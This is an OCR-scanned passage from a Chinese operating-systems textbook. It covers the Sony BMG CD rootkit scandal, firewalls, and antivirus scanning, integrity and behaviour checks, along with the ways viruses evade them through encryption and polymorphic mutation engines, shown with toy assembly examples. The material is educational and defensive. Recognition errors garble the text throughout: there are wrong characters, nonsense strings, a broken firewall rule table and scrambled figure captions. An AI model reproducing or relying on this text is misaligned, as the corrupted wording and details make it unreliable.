有 这 些 文件 因为 即便 它们 存在 也 会 被 单机 CD 播放 右 忽 略 。 显 然 Sony 的 
东 个 天 才 认 为 他 可 以 聪明 地 通过 放置 一 个 autorun.inf 文 件 在 一 些 CD 上 来 





防止 音乐 盗版 。 当 这 些 CD 插 入 计算 机 时 ， 就 会 立即 安静 地 安装 一 个 
12MB 大 小 的 rootkit。 然 后 一 个 许可 协议 被 显示 ， 其 中 没有 提 到 任何 关 
于 软件 被 安装 的 信息 。 在 显示 许可 的 同时 ，Sony 的 软件 检查 是 否 有 200 
种 已 知 的 复制 软件 中 的 任 一 种 正在 运行 ， 如 果 有 的 话 束 命令 用 户 集 止 这 
些 复制 软件 。 如 果 用 户 同 意 许 可 协议 并 关闭 了 所 有 的 复制 软件 ， 音 乐 将 
可 以 播放 ， 和 否则 音乐 就 不 能 播放 。 即 使 用 户 拒绝 协议 ，rootkit 仍 然 被 安 
装 。 








这 个 rootkit 的 工作 方法 如 下 。 它 向 Windows 内 核 插 入 一 系列 文件 名 
由 “$sys$” 起 始 的 文件 。 这 些 文件 之 一 是 一 个 过 滤器 ， 这 个 过 滤器 截取 所 
有 向 CD-ROM 驱 动 器 的 系统 调用 并 禁止 除 Sony 的 音乐 播放 器 之 外 的 所 有 
程序 读 取 CD。 这 一 动作 使 得 复制 CD 到 硬盘 〈 这 是 合法 的 ) 变 得 不 可 
能 。 另 一 个 过 滤器 截取 所 有 读 取 文 件 、 进 程 和 注册 表 列 表 的 调用 ， 并 删 
除 所 有 由 “$sys$” 起 始 的 项 (即便 这 些 项 是 由 与 Sony 和 音乐 都 完全 无 关 
的 程序 而 来 的 ) ， 目 的 是 为 了 掩 新 rootkit。 这 一 方法 对 于 rootkit 设 计 新 
手 来 说 非常 标准 。 











在 Russinovich 发 现 这 一 rootkit 之 前 ， 它 已 经 被 广泛 地 安装 ， 这 完全 
不 令 人 尺 讶 ， 因 为 在 超过 2000 万 张 CD 上 包含 此 rootkit。Dan 
Kaminsky (2006) 研究 了 其 广度 并 发 现 全 世界 超过 50 万 个 网 络 中 的 计算 
机 已 经 被 感染 。 


当 消 息 传 出 时 ，Sony 的 第 一 回应 是 它 有 权 保 护 其 知识 产权 。 在 


National Public Radio 的 一 次 采访 中 ，Sony BMG 的 全 球 数字 业务 主席 
Thomas Hesse 说 : “我 认为 绝 大 多 数 人 甚至 不 知道 什么 是 rootkit， 那 么 他 
们 何必 那么 在 意 它 ?” 当 这 一 回应 激 起 了 公众 怒火 时 ，Sony 让 步 并 发 行 
了 一 个 补丁 来 移 除 对 “$sys$” 文 件 的 掩盖 ， 但 仍 保留 rootkit。 随 着 压力 的 
增加 ，Sony 最 终 在 其 网 站 上 发 布 了 一 个 邮 载 程序 ， 但 作为 获得 季 载 程序 
的 条 件 ， 用 户 必 须 提供 一 个 E-mail 地 址 并 同意 Sony 可 以 在 以 后 向 他 们 发 
送 宣 传 材料 〈 这 些 可 以 被 大 多 数 人 过 滤 掉 ) 。 


随 着 故事 的 终结 ， 人 们 发 现 Sony 的 凶 载 程序 存在 技术 缺陷 ， 使 得 被 
感染 的 计算 机 非常 容易 遭受 互联 网 上 的 攻击 。 人 们 还 发 现 该 rootkit 包 含 
了 从 开源 项 目 而 来 的 代码 ， 这 违反 了 这 些 开 源 项 目的 著作 权 《〈 这 些 开 源 
项 目的 著作 权 要 求 对 其 软件 的 免费 使 用 也 发 布 源 代码 ) 。 








除了 空前 的 公众 关系 灾难 之 外 ，Sony 也 面临 着 法 律 危 机 。 德 克 萨 斯 
州 控 告 Sony 违 反 了 其 反 间 谍 软 件 法 以 及 欺诈 性 贸易 惯例 法 (因为 即使 许 
可 被 拒绝 rootkit 仍 然 会 被 安装 ) 。 此 后 在 39 个 州都 提起 了 公诉 。 在 2006 
年 12 月 ， 在 Sony 同 意 文 付 425 万 美元 、 同 意 停止 在 其 未 来 的 CD 中 放 人 入 
rootkit 并 授权 每 位 受害 者 可 以 下 载 一 个 有 限 的 音乐 目录 下 的 三 张 专辑 之 
后 ， 这 些 诉讼 得 以 解决 。 在 2007 年 1 月 ，Sony 承 认 其 软件 秘密 监视 用 户 
的 收听 习惯 并 将 其 报告 回 Sony 也 违反 了 美国 法 律 。 在 与 公平 贸易 委员 会 
CFTC) 的 协议 中 ，Sony 同 意 支 付 那些 计算 机 遭 到 其 软件 破坏 的 用 户 
150 美 元 的 补偿 。 














关于 Sony 的 rootkit 的 故事 已 经 为 每 一 位 曾经 认为 rootkit 只 是 学 术 上 
的 稀奇 事物 而 与 现实 世界 无 天 的 读者 提供 了 实例 。 在 互联 网 上 搜 
“Sony rootkit” 会 发 现 大 量 补充 信息 。 











9.8 ”防御 


面 对 危 机 四 伏 的 状况 ， 那 么 还 有 确保 系统 安全 的 可 能 吗 ? 当然 ， 是 
有 的 ， 下 面 的 小 节 要 介绍 一 下 几 种 设计 和 实现 系统 的 方法 来 提高 它们 的 
安全 性 。 一 个 最 重要 的 概念 就 是 全 面 防御 (defense in depth) 。 基 本 地 
讲 ， 这 个 概念 是 指 你 必须 有 多 层 的 安全 性 ， 以 便于 当 其 中 的 一 层 被 破 
坏 ， 仍 然 还 有 其 他 层 要 去 防御 。 想 象 一 下 这 样 的 一 个 房子 ， 有 一 个 高 的 
带 钉 子 的 关闭 着 的 铁 栅栏 ， 在 院子 里 有 运动 检测 器 ， 前 门 上 有 两 把 做 工 
精良 的 锁 ， 屋 子 里 还 有 一 个 计算 机 控制 的 盗窃 报警 系统 。 每 一 个 技术 自 
己 本 身 都 是 有 价值 的 ， 为 了 阅 入 这 个 房子 盗贼 需要 打败 所 有 的 防御 。 一 
个 安全 的 计算 机 系统 就 应 该 像 这 个 房子 一 样 ， 有 着 多 层 的 安全 性 。 我 们 
将 要 介绍 其 中 的 某 些 层次 。 防 御 不 是 真 的 分 等 级 的 ， 而 是 我 们 要 从 一 般 
的 外 部 的 东西 开始 ， 然 后 逐渐 深入 到 细节 。 

















9.8.1 防火 墙 


能 够 把 任何 地 方 的 一 台 计 算 机 连接 到 其 他 一 台 任 何 地 方 的 计算 机 上 
古 一 件 好 坏 参 半 的 事情 。 网 络 上 有 很 多 有 价值 的 资料 ， 但 是 同时 连接 到 
Intemet 上 也 使 我 们 的 计算 机 面临 奢 两 种 危险 : 来 自 外 部 和 来 自 内 部 。 来 
目 外 部 的 危险 包括 黑客 、 病 毒 、 间 谍 软 件 以 及 其 他 的 恶意 软件 。 来 自 内 
部 的 危险 包括 了 机 密 信 息 泄 露 ， 比 如 信用 卡号 、 密 码 、 纳 税 申请 单 和 各 





种 各 样 的 公司 信息 


因此 ， 我 们 需要 茶 种 机 制 来 保证 “好 ?的 留 下 来 并 且 阻 止 “ 坏 ”的 进 
入 。 一 种 方法 是 使 用 防火 墙 (firewal) ， 它 是 一 种 中 世纪 古老 的 安全 措 
施 的 现代 版 本 : 在 你 的 城堡 周围 挖 一 条 护城河 。 这 样 的 设计 强制 每 一 个 
进入 或 者 离开 城堡 的 人 都 要 经 过 惟一 的 一 座 吊桥 ，IO 和 警察 可 以 在 四 桥 
上 检查 每 一 个 经 过 的 人 。 对 于 网 络 ， 这 种 方法 也 是 可 行 的 : 一 个 公司 可 

能 有 很 多 的 任意 连接 的 局 域 网 ， 但 是 所 有 进入 或 离开 公司 的 网 络 流 都 要 
强制 地 通过 一 个 电子 吊桥 一 一 防火 墙 。 





防火 墙 有 两 种 基本 的 类 型 : 硬件 防火 场 和 软件 防火 场 。 有 局 域 网 需 
要 保护 的 公司 通 各 选择 硬件 防火 场 ， 而 家 许 的 个 人 用 己 通 利 会 选择 软件 
防火 墙 。 首 先 ， 让 我 们 看 一 看 硬件 防火 增 。 一 般 的 硬件 防护 墙 如 图 9-31 
所 示 。 在 该 图 中 ， 来 自 网 络 提供 者 的 连接 〈 电 统 或 光纤 ) 会 被 插 到 防火 
墙 上 ， 防 火 墙 也 连接 到 局 域 网 上 。 不 经 过 防火 墙 的 允许 任何 包 都 不 能 
入 或 者 离开 局 域 网 。 实 际 的 情况 下 ， 防 护 增 遂 常会 和 路 由 器 、 网 络 地 址 
转换 合 、 指 令 检 查 系统 和 其 他 设备 联合 起 来 工作 ， 但 是 在 这 里 我 们 只 关 
注 于 防火 墙 上 自身 的 功能 
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图 9-31 一 个 由 防火 墙 保护 的 局 域 网 示意 图 〈 仿 三 台 主 机 ) 


防火 墙根 据 一 些 规则 来 配置 ， 这 些 规则 描述 什么 是 允许 的 ， 什 么 是 
不 允许 的 。 防 护 墙 的 管理 者 可 以 修改 这 些 规 则 ， 通 常 修改 是 通过 一 个 
Web 界 面 进 行 的 (大 多 数 防火 墙 都 内 置 一 个 小 型 Web 服 务 器 来 实现 
它 ) 。 最 简单 的 一 种 防护 墙 是 无 状态 防护 墙 〈stateless firewall) ， 只 会 
检查 通过 的 包 的 头 部 ， 然 后 根据 包头 部 的 信息 和 防火 墙 的 规则 作出 传送 
还 是 丢弃 这 个 包 的 决定 。 包 头 部 的 信息 包括 源 和 目的 的 IP 地 址 、 源 和 目 
的 的 端口 、 服 务 的 类 型 和 协议 。 包 头 部 的 其 他 属性 也 是 可 以 得 到 的 ， 但 
是 很 少 会 被 防火 墙 的 规则 涉及 


在 图 9-31 中 ， 我 们 有 3 个 服务 器 ， 每 一 个 都 有 一 个 惟一 的 IP 地 址 ， 
形 如 207.68.160.x， 其 中 x 依次 是 190、191、192。 这 三 个 地 址 就 是 那些 
要 发 送 给 这 些 服务 器 的 包 的 目的 地 址 。 进 来 的 包 同 时 也 包含 一 个 16 位 的 
端口 号 Cport number) ， 来 描述 机 右上 哪 一 个 进程 来 获得 这 个 包 〈 一 个 
进程 能 监听 一 个 来 自 外 部 网 络 流量 的 端口 ) 。 一 些 端口 是 和 一 些 标准 服 
务 联系 在 一 起 的 。 特 别 地 ， 端 口 80 被 Web 使用， 端口 25 被 E-mail 使 用 ， 





端口 21 被 FTP《〈 文 件 传输 协议 ) 服务 使 用 ， 但 是 大 多 数 其 他 的 端口 是 被 
用 户 定 义 的 服务 使 用 的 。 在 这 样 的 条 件 下 ， 防 火 墙 可 能 按照 如 下 规则 配 
置 : 


IP 地 址 端 | 
207.68.160.190 
207.68.160.191 





这 些 规则 只 有 当 包 被 发 送 到 端口 80 的 时 候 ， 才 会 允许 进入 地 址 是 
207.68.160.190 的 机 器 ， 这 个 机 器 的 其 他 端口 都 是 被 禁止 的 并 且 发 送 给 
这 些 端口 的 包 都 会 被 防火 墙 目 动 于 人 弃 。 同 样 ， 只 有 发 送 给 端口 25 和 21 的 
包 才 可 以 进入 其 他 两 个 机 器 。 所 有 其 他 的 网 络 流 都 是 禁止 的 。 这 个 规则 
集 使 得 攻击 者 除了 提供 的 三 个 公共 的 服务 以 外 ， 很 难 访问 到 局 域 网 。 





虽然 有 了 防火 墙 ， 局 域 网 还 是 可 能 会 受到 攻击 。 例 如 ， 如 果 Web 服 
务 器 是 Apache 并 且 攻 击 者 找到 了 一 个 可 以 利用 的 Apache 的 bug， 那 么 他 
可 以 发 送 一 个 很 长 的 URL 到 207.68.160.190 的 端口 80， 然 后 制造 一 个 组 
冲 区 溢出 ， 进 而 控制 由 防火 墙 保护 的 一 台 机 器 ， 通 过 这 个 机 器 可 以 发 动 
对 局 域 网 内 其 他 机 器 的 攻击 。 





为 一 种 潜在 的 攻击 是 写 一 个 多 和 人 游戏， 发布 这 个 游戏 并 且 让 它 得 到 


广泛 的 接受 。 这 个 游戏 的 软件 需要 茶 个 端口 来 和 其 他 的 玩家 联系 ， 所 以 
游戏 设计 者 会 选择 一 个 端口 ， 比 如 9876， 并 且 告 诉 玩家 来 改变 防火 墙 的 
设置 ， 来 允许 在 这 个 端口 网 络 流 的 进出 。 打 开端 口 的 人 现在 也 容易 受到 
这 个 端口 上 的 攻击 。 即 使 这 个 游戏 是 合法 的 ， 那 么 它 也 可 能 包含 一 些 可 
以 利用 的 bug。 打 开 越 多 的 端口 ， 科 成功 攻 击 的 机 会 融 越 大 。 防 火场 上 
的 每 一 个 问 口 都 增加 了 攻击 通过 的 可 能 。 





除了 无 状态 防火 墙 以 外 ， 还 有 一 种 跟踪 连接 以 及 连接 状况 的 防火 
省 。 这 些 防火 墙 能 够 更 好 地 防止 某 些 类 型 的 攻击 ， 特 别 是 那些 和 建立 连 
接 有 关 的 攻击 。 另 外 ， 一 些 其 他 类 型 的 防火 墙 实现 了 入 侵 检 测 系统 
(Intrusion Detection System, IDS) ， 利 用 IDS 防 火 墙 不 仅 可 以 检测 包 的 
头 部 还 可 以 用 检测 包 的 内 容 来 查找 可 疑 的 内 容 。 





软件 防火 场 ， 有 时 也 叫做 个 人 防火 场 ， 和 硬件 防火 场 具 有 同样 的 功 
能 ， 只 不 过 是 通过 软件 方式 实现 的 。 它 们 是 附加 在 操作 系统 内 核 的 网 络 
代码 上 的 过 滤器 ， 是 和 硬件 防火 墙 工 作 机 制 一 样 的 过 渡 数 据 包 。 


9.8.2 ” 反 病 毒 和 抑制 反 病 毒 技 术 


正如 上 文 所 提 到 的 ， 防 火 墙 会 尽量 地 阻止 入 侵 者 进入 电脑 ， 但 是 在 
很 多 情况 下 防火 墙 会 失败 。 在 这 种 情况 下 ， 下 一 道 防线 是 由 反 恶 意 软 件 
的 程序 antimalware program》 组 成 的 。 尽 管 这 种 反 恶 意 软件 的 程序 同 
样 可 以 对 抗 蠕虫 和 间谍 软件 ， 但 是 它们 通常 称 做 反 病毒 程序 (antivirus 
program) 。 病 毒 尽量 地 隐藏 自己 ， 而 用 户 则 是 努力 地 发 现 它 们 ， 这 就 
像 是 一 个 猫 捉 老鼠 的 游戏 。 在 这 方面 ， 病 毒 很 像 rootkit， 不 同 的 地 方 是 
病毒 的 制造 者 更 强调 的 是 病毒 的 传播 速度 而 不 是 像 rookit PE FAR 
迷 藏 。 现 在 ， 让 我 们 来 看 看 反 病 毒 软 件 所 使 用 的 技术 ， 以 及 病毒 的 制造 
者 Virgil 是 怎么 应 对 这 些 技术 的 。 




















1. 病 毒 扫描 器 
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上 出 现 了 反 病 毒 软 件 。 下 面 我 们 将 讨论 一 下 反 病 毒 软件 的 工作 原理 。 反 
病毒 软件 公司 拥有 一 流 的 实验 室 ， 在 那里 许多 专家 长 时 间 地 跟踪 并 研究 
不 断 涌现 出 的 新 病毒 。 第 一 步 是 让 病毒 感染 不 执行 任何 操作 的 程序 ， 这 
类 程序 叫做 诱饵 文件 ， 然 后 获取 病毒 的 完整 内 容 。 下 一 步 是 列 出 病毒 的 
完全 代码 表 把 它 输 入 已 知 病毒 的 数据 库 。 公 司 之 间 为 其 数据 库 的 容量 而 
竞争 。 发 现 新 的 病毒 就 放 到 数据 库 中 与 体育 竞赛 是 完全 不 同 的 。 














一 且 反 病毒 软件 安装 在 用 户 的 计算 机 里 ， 第 一 件 事 就 是 在 硬盘 里 扫 
描 所 有 可 执行 文件 ， 看 看 是 否 能 发 现 病毒 库 里 已 知 的 病毒 。 大 多 数 反 病 
毒 公 司 都 建 有 网 站 ， 从 那里 客户 可 以 下 载 新 发 现 病毒 的 特征 码 到 自己 的 
病毒 库 里 。 如 果 用 户 有 10 000 个 文件 ， 而 病毒 库 里 有 10 000 种 病毒 ， 当 
然 需要 一 些 高 效 的 代码 使 得 程序 得 以 更 快 地 运行 。 

















由 于 有 些 已 知 病毒 总 是 在 不 断 发 生 细微 变化 ， 所 以 人 们 需要 一 种 模 
糊 碍 询 软件 ， 这 样 即 便 3 个 字 节 的 改变 也 不 会 让 病毒 逃避 检测 。 但 是 ， 
RW MOEA, MEAD SSRI Call) 。7 年 前 
在 巴基斯坦 ， 有 些 合法 的 文件 恰巧 包含 了 与 病毒 代码 极为 相像 的 字符 ， 
结果 导致 了 病毒 报警 。 用 户 这 时 往往 会 看 到 下 面 的 信息 : 




















WARNING! File xyz.exe may contain the lahore-9x virus.Delete? 








数据 库 里 的 病毒 越 多 ， 扫 描 标 准 越 宽松 ， 误 报警 的 可 能 性 就 越 大 。 
如 宁 出 现 了 太 多 的 误 报 警 ， 用 户 会 因为 大 烦 而 放弃 使 用 。 但 是 如 果 病 毒 
扫描 需 坚 持 严 格 匹 配 病毒 码 ， 它 束 会 错过 许多 变形 病毒 。 解 决 办 法 是 要 
达到 一 种 微妙 的 平衡 ， 完 美的 扫描 软件 应 该 识别 病毒 的 核心 代码 ， 这 些 
核心 代码 不 会 轻易 改变 ， 从 而 能 够 作为 病毒 的 特征 签名 来 查找 。 











由 于 磁盘 里 的 文件 上 周 被 宣布 无 病毒 感染 后 并 不 意味 着 现在 仍 未 被 
感染 ， 所 以 人 们 需要 经 常 使 用 病毒 扫描 。 因 为 扫描 速度 很 乙 ， 所 以 要 保 
持 效 率 束 应 该 仅 对 上 次 扫 揪 后 被 改动 的 文件 进行 检查 。 但 是 ， 聪 明 的 病 

















毒 会 把 感染 过 的 文件 日 期 重 置 为 初始 日 期 以 逃避 检验 。 于 是 ， 反 病毒 程 
序 修改 校 验 文件 所 在 目录 的 日 期 。 但 是 病毒 接着 义 把 目录 的 日 期 也 改 
挤 。 这 就 像 我 们 上 面 所 提 到 的 猫 提 老鼠 游戏 一 样 。 











反 病 毒 软件 的 另 一 种 方法 是 检测 文件 ， 记 录 和 存放 所 有 文件 的 长 
度 。 如 果 一 个 文件 自 上 周 以 来 突然 增加 了 许多 ， 就 有 可 能 被 感染 ， 如 图 
9-32a 所 示 。 但 是 ， 聪 明 的 病毒 可 通过 程序 压缩 原 有 文件 并 将 其 填充 到 
原 有 长 度 来 逃避 检查 。 要 使 这 种 方法 奏效 ， 病 毒 必须 还 要 包含 压缩 和 解 
压缩 过 程 ， 如 图 9-32c 所 示 。 
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图 9-32 四 一 段 程序 ; b) 已 感染 的 程序 ; 被 压缩 的 已 感染 程序 ; 中 加 
密 的 病毒 ; 日 带 有 加 窖 压缩 代码 的 压缩 病毒 








病毒 还 有 一 种 逃避 检 训 办 法 ， 那 束 是 让 目 己 在 磁盘 里 呈现 出 的 特征 








与 病毒 数据 库 里 的 特性 不 尽 相 同 。 要 达到 这 一 目标 ， 方 法 之 一 是 每 感染 
一 个 文件 就 用 不 同 的 密 钥 将 自身 加 密 。 在 复制 新 的 病毒 体 之 前 ， 病 毒 先 
随机 产生 一 个 32 位 的 加 密 密 钥 ， 如 将 当前 时 间 与 内 存 里 诸如 72 008 和 
319 992 等 数字 进行 异 或 。 然 后 将 病毒 代码 与 这 一 密 钥 逐 字 节 地 有 寞 或 ， 
加 密 后 的 结果 值 储存 在 被 感染 文件 中 ， 如 图 9-32d 所 示 。 密 钥 也 同时 存 
放 在 文件 中 。 从 保密 性 角度 来 说 ， 把 密 钥 放 进 文件 是 不 明智 的 。 这 样 做 
的 目的 无 非 是 为 了 对 付 病 毒 扫 描 ， 但 却 不 能 防止 专家 在 反 病 毒 实验 室 里 
逆向 破解 出 病毒 代码 。 当 然 ， 病 毒 在 运行 时 必须 首先 对 自己 解密 ， 所 以 
在 文件 里 也 同时 需要 解密 过 程 。 


























上 述 策略 实际 上 并 不 完善 ， 因 为 压缩 、 解 压缩 、 加 密 和 解密 等 过 程 
在 复制 每 个 病毒 体 时 都 是 一 样 的 ， 反 病毒 软件 可 以 利用 这 一 特征 来 查 杀 
病毒 。 把 压缩 、 解 压 纵 和 加 密 过 程 隐 藏 起 来 较为 容易 : 只 要 对 它们 加 密 
并 存放 在 病毒 体 里 ， 如 图 9-32e 所 示 。 但 是 ， 解 密 过 程 不 能 被 加 密 ， 它 
必须 运行 在 硬件 上 以 便 将 病毒 体 的 其 余部 分 解密 ， 所 以 必须 用 明文 格式 
存放 。 反 病毒 软件 当然 知道 这 些 ， 所 以 它们 专门 搜索 解密 过 程 。 








然而 ，Virgil 喜 欢笑 到 最 后 ， 所 以 他 采用 了 下 面 的 步 又。 假设 解 密 
过 程 需要 进行 如 下 运算 : 





X= (A+B+C-4) 








在 普通 的 双 地 址 计算 机 上 可 以 运用 汇编 语言 编写 该 运算 ， 如 图 9- 


33a 所 示 。 第 一 个 地 址 是 源 地 址 ; 第 二 个 地 址 是 目标 地 址 ， 所 以 MOV 
A，R1 是 把 变量 A 放 入 寄存 器 R1 中 。 图 9-33b 的 代码 也 是 同样 的 意思 ， 不 
同 之 处 仅仅 在 于 代码 中 插入 了 NOP (无 操作 〉 指令 而 降低 了 效率 。 





现在 整个 编码 工作 还 未 完成 。 为 了 伪 效 解密 代码 ， 可 以 用 许多 方法 
来 替代 NOP。 例 如 ， 把 0 加 入 寄存 器 、 自 身 异 或 、 左 移 0 位 、 跳 转 到 下 一 
个 指令 等 ， 所 有 的 都 不 做 任何 操作 。 所 以 ， 图 9-33c 在 功能 上 与 图 9-33a 
是 相同 的 。 当 病毒 复制 自身 时 ， 往 往 采 用 图 9-33c 的 代码 而 不 是 图 9- 
33a， 这 样 在 日 后 运行 时 还 能 工作 。 这 种 每 次 复制 时 都 发 生变 异 的 病毒 
叫做 多 形态 病毒 (polymorphic virus) 。 























现在 假设 在 这 段 代 码 里 不 再 需要 R5 寄 存 器 。 也 就 是 说 ， 图 9-33d 与 
图 9-33a 的 功能 一 致 。 最 后 ， 在 许多 情况 下 ， 可 以 交换 指令 而 不 会 改变 
程序 功能 ， 我 们 用 图 9-33e 作 为 为 一 种 与 图 9-33a 在 逻辑 上 保持 一 致 的 代 
码 段 。 这 种 能 够 交换 机 器 人 码 指令 而 不 影响 程序 功能 的 代码 叫做 变异 引擎 
(mutation engine) 。 较 复杂 的 病毒 在 复制 病毒 体 时 ， 可 以 通过 变 腊 引 
擎 产生 不 同 的 解密 代码 。 变 腊 的 手段 包括 插入 一 些 没 用 而 且 没 有 人 危害 的 
代码 ， 改 变 代码 的 顺序 ， 交 换 寄存 器 ， 把 茶 条 指令 用 它 的 等 价 指令 符 
换 。 变 异 引擎 本 身 与 病毒 体 一 起 也 可 以 通过 加 密 的 方法 隐藏 起 来 。 














MOV A,R1 
ADD B,R1 
ADD C,R1 
SUB #4,R1 
MOV R1,X 


MOV A,R1 
NOP 
ADD B,R1 
NOP 
ADD C,R1 
NOP 
SUB #4,R1 
NOP 
MOV R1,X 


MOV A,R1 
ADD #0,R1 
ADD B,R1 
OR R1,R1 
ADD C,R1 
SHL #0,R1 


SUB #4,R1 
JMP .+1 
MOV R1,X 


MOV A,R1 
OR R1,R1 
ADD B,R1 
MOV R1,R5 
ADD C,R1 
SHL R1,0 
SUB #4,R1 
ADD R5,R5 
MOV R1,X 


MOV A,R1 
TST R1 
ADD C,R1 
MOV R1,R5 
ADD B,R1 
CMP R2,R5 


SUB #4,R1 
JMP .+1 
MOV R1,X 


MOV RS,Y 
b) c) d) 


MOV R5,Y 





图 9-33 多 形态 病毒 的 实例 


要 求 较 差 的 反 病毒 软件 意识 到 图 9-33a 至 图 9-33e 有 具有 相同 的 代码 功 
能 是 相当 困难 的 ， 特 别 是 当 变 异 引 擎 有 能 力 “ 狭 免 三 祁 ? 时 。 反 病毒 软件 
可 以 分 析 病 毒 代码 ， 了 人 解 病毒 原理 ， 甚 至 可 以 试图 模拟 代码 操作 ， 但 我 
们 必须 记 住 有 成 干 上 万 的 病毒 和 成 和 二 上 万 的 文件 需要 分 析 ， 所 以 每 次 测 
试 不 能 花费 太 多 的 时 间 ， 人 否则 运行 起 来 会 怀 人 地 慢 。 











另外 ， 储 存在 变量 Y 里 的 值 是 为 了 让 人 们 难以 发 现 与 R5 有 关 的 代码 
古 死 码 的 事实 ， 和 死 码 不 会 做 任何 事情 。 如 果 其 他 代码 段 对 Y 进 行 了 读 
写 ， 代 码 就 会 看 上 去 十 分 合法 。 一 个 写 得 十 分 好 的 变异 引擎 代码 会 产生 
极 强 的 变种 ， 会 给 肥 病 毒 软件 的 作者 市 来 嘲 梦 般 的 厅 烦 。 惟 一 让 人 安居 
的 是 这 样 的 引擎 很 难 编写 ， 所 以 Virgil 的 朋友 都 使 用 他 的 代码 ， 结 果 在 
病毒 界 里 并 没有 种 类 繁 多 的 变异 引擎 。 





到 目前 为 止 ， 我 们 讨论 的 是 如 何 识别 被 感染 的 可 执行 文件 里 的 病 


毒 。 而 且 ， 反 病毒 扫描 器 必须 检查 MBR、 引 导 扇 区 、 坏 扇 区 列表 、 内 
速 ROM、CMOS 等 区 域 。 但 是 如 果 有 内 存 驻 留 病毒 在 运行 会 怎样 呢 ? 该 
内 存 驻 留 病毒 不 会 被 发 现 。 更 糟 的 是 假设 运行 的 病毒 正在 控制 所 有 的 系 
统 调用 ， 它 就 能 轻易 地 探测 到 反 病 毒 程 序 正 在 读 引 导 扇 区 《〈 用 以 碍 找 病 
毒 ) 。 为 了 阻止 反 病毒 程序 ， 病 毒 进 行 系统 调用 ， 相 反 它 把 真正 的 引导 
区 从 坏 扇 区 列表 的 藏身 之 地 返回 。 它 也 可 以 作 记 录 ， 在 被 扫描 器 检查 以 
后 会 再 次 感染 所 有 的 文件 。 




















为 了 防止 被 病毒 欺骗 ， 反 病毒 程序 也 可 以 会 跳 过 操作 系统 直接 去 读 
物理 磁盘 。 不 过 这 样 做 需要 具有 用 于 IDE、SCSI 和 其 他 种 类 硬盘 的 内 置 
设备 驱动 程序 ， 这 样 会 降低 反 病 毒 程 序 的 可 移植 性 ， 遇 到 不 通用 的 硬盘 
就 会 一 筹 英 展 。 而 且 ， 跳 过 操作 系统 来 读 取 引 导 扇 区 是 可 以 的 ， 但 是 中 
过 操作 系统 来 读 取 所 有 的 可 执行 文件 却 是 不 可 能 的 ， 所 以 仍然 存在 病毒 
产生 出 与 可 执行 文件 相关 的 欺骗 性 数据 的 危险 。 














2. 完 整 性 检查 程序 





为 一 种 完全 不 同 的 病毒 检测 方法 是 实施 完整 性 检查 (integrity 
checking) 。 采 用 这 种 方法 的 反 病 毒 程序 首先 扫描 硬盘 上 的 病毒 ， 一 旦 
确信 便 盘 是 干净 的 ， 它 就 开始 为 每 个 可 执行 文件 计算 一 个 校 验 和 。 计 算 
校 验 和 的 算法 应 该 是 很 简单 的 ， 束 像 把 程序 段 中 的 所 有 字 作 为 32 位 或 者 
64 位 整数 加 起 来 求 和 一 样 简单 ， 但 是 这 种 算法 也 要 像 加 密 的 散 列 算法 一 
样 ， 是 不 可 能 逆向 求解 的 。 然 后 ， 要 把 一 个 目录 中 的 所 有 相关 文件 的 校 











验 和 写 到 一 个 文件 中 去 。 下 一 次 运行 的 时 候 ， 程 序 重 新 计算 校 验 值 ， 看 
和 是否 与 校 验 和 文件 里 的 值 相 匹 配 。 这 样 被 感染 的 文件 会 立刻 被 查 出 。 








问题 在 于 Virgil 并 不 愿意 让 病毒 被 碍 出 ， 他 可 以 写 一 段 病毒 代码 把 
校 验 和 文件 移 走 。 更 糟 的 是 ， 他 可 以 计算 已 感染 病毒 的 文件 校 验 值 ， 用 
这 一 值 蔡 代 校 验 和 文件 里 的 正常 值 。 为 了 保护 校 验 值 不 被 更 改 ， 反 病毒 
程序 可 以 党 试 把 该 文件 藏 起 来 ， 但 对 长 时 间 研 究 反 病 毒 程 序 的 Virgil 来 
说 ， 这 种 方法 也 难以 奏效 。 比 较 好 的 方法 是 对 文件 加 密 以 便 使 得 其 上 的 
人 破坏 容易 被 发 现 。 理 想 状 态 是 加 密 采 用 了 智能 卡 技术 ， 加 密 密 钥 被 放 在 
心 片 里 使 得 程序 无 法 读 到 。 








3. 行 为 检查 程序 


第 三 种 反 病 毒 程序 使 用 的 方法 是 实施 行为 检查 (behavioral 
checking) 。 通 过 这 种 方法 ， 反 病毒 程序 在 系统 运行 时 驻 留 在 内 存 里 ， 
并 上 自己 捕捉 所 有 的 系统 调用 。 这 一 方法 能 够 监视 所 有 的 系统 活动 ， 并 试 
图 捕捉 任何 可 能 被 怀疑 的 行为 。 例 如 ， 通 常 没 有 程序 会 禾 盖 引导 局 区 ， 
所 以 有 这 种 企图 的 程序 几乎 可 以 肯定 古 病毒 。 同 理 ， 改 变 内 速 ROM 的 
内 容 也 值得 怀疑 。 























但 是 也 有 些 情 况 比 较 难以 判断 。 例 如 ， 履 兰 可 执行 文件 是 一 个 特殊 
的 操作 ， 除 非 是 编译 器 。 如 果 反 病毒 程序 检测 到 了 这 样 一 个 写 的 动作 并 
发 出 了 警告 ， 它 希望 用 户 能 根据 当时 情形 决定 是 人 否 要 徐 盖 可 执行 文件 。 








同样 ， 当 Word 用 一 个 全 是 宏 的 新 文件 重 写 .doc 文 件 时 不 一 定 古 病毒 的 杰 
作 。 在 Windows 中 程序 可 以 从 可 执行 文件 里 分 离 出 来 ， 并 使 用 特殊 的 系 
统 调用 驻 留 内 存 。 当 然 ， 这 也 可 能 是 合法 的 ， 但 是 给 出 警告 还 是 是 十 分 
有 用 的 。 











病毒 并 不 会 被 动 地 等 着 反 病毒 程序 杀 死 自己 ， 它 们 也 会 反击 。 一 场 
特别 有 趣 的 战斗 会 发 生 在 内 存 驻 留 病毒 和 内 存 驻 留 反 病 毒 程 序 之 间 。 多 
年 以 前 ， 有 一 个 叫做 Core Wars 的 游戏 ， 在 游戏 里 两 个 程序 员 各 目 放 置 
程序 到 空余 的 地 址 空间 里 。 程 序 依次 抢 和 于 内存， 目的 是 把 对 手 的 程序 清 
理 出 去 来 扩大 自己 的 地 盘 。 病 毒 与 反 病 毒 程序 之 间 的 战斗 就 有 点 像 这 个 
游戏 ， 而 战场 转换 到 了 那些 并 不 希望 战斗 发 生 的 受害 者 的 机 器 里 。 更 粳 
的 是 ， 病 毒 有 一 个 优势 ， 它 可 以 去 买 肥 病毒 软件 来 了 解 对 手 。 当 然 ， 一 
旦 病毒 出 现 ， 反 病毒 小 组 也 会 修改 软件 ， 从 而 逼迫 Virgil 不 得 不 再 买 新 
的 版 本 。 














4. 病 毒 避 免 


每 一 个 好 的 故事 都 需要 理念 。 这 里 的 理念 是 : 


